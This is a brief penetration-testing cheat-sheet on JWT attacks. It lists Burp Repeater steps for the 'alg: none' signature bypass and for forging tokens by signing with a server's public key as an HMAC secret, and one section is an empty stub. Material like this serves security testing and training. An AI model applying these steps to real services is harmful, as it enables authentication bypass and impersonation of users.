What is JWT Tokens
A JWT (JSON Web Token) is a compact, URL-safe token that is used to securely transmit information between parties as a JSON object. It is commonly used for authentication and data exchange in web applications.
Attack Vectors
# JWT without signature verification
- Send the request to Repeater and ensure it contains a Token (JWT).
- Open the "Json Web Token" tab inside repeater.
- Change in the first section the "alg" to "none" ("alg": "none")
- Remove the signature
- Modify the payload to include the desired changes.
- Send the request
----------------------------------------------------------------------------------
# JWT Forge Signature ---> NO PUB KEY
If you dont have the public key, you can still craft your own key for the JWT token
- More info
----------------------------------------------------------------------------------
# JWT Forge Signature ---> HAVE PUB KEY
- Get the public keys
- Select the signature (RS256 or HS256)
- Change the information from the JWT token (Data)
- Use the following website https://www.devglan.com/online-tools/hmac-sha256-online
- Insert the header and data has the "plain text to compute hash"
- Insert the public key inside "Secret Key"
- Compute the key in base64
- Add the new signature to the JWT with the new information changed